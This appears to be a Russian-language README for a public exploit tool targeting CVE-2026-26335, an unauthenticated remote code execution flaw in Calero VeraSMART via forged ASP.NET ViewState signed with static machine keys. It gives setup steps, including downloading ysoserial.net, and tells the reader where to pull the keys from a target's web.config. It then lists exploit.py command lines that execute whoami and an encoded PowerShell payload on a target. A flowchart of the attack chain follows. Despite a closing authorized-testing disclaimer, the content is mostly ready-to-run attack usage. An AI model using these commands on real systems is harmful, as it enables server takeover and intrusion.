
Автоматический эксплойт для CVE-2026-26335 — критической неаутентифицированной RCE-уязвимости в Calero VeraSMART через поддельный ASP.NET ViewState с использованием статических ключей машины. Включает обнаружение конечных точек, генерацию полезной нагрузки и выполнение команд.
Mohammed Idrees Banyamer Исследователь в области безопасности
CVE‑2026‑26335 — критическая уязвимость удалённого выполнения кода без аутентификации в Calero VeraSMART (до версии 2022 R1).
Приложение использует статически заданные ASP.NET machine keys, одинаковые для всех установок.
Злоумышленник, обладающий этими ключами, может подделать вредоносный ASP.NET ViewState и вызвать десериализацию на стороне сервера → RCE.
Эксплойт автоматизирует:
__VIEWSTATEGENERATORCWE‑321 — Жёстко заданные криптографические ключи
Развёртывания VeraSMART используют одинаковый ASP.NET machineKey:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
Любой злоумышленник, получивший ключи от одной установки, может атаковать все остальные.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
Ключи не являются публичными. Получите их с целевой системы:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
Или через сопутствующее чтение файлов:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Критический AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Исправлено в VeraSMART 2022 R1:
Обходные меры:
Только для образовательных целей и авторизованного тестирования. Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть разрешение.
Mohammed Idrees Banyamer Исследователь в области безопасности
На следующей диаграмме показана цепочка эксплуатации CVE‑2026‑26335 в Calero VeraSMART, где статические ASP.NET machine keys позволяют подделать вредоносный ViewState, что приводит к удалённому выполнению кода.
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]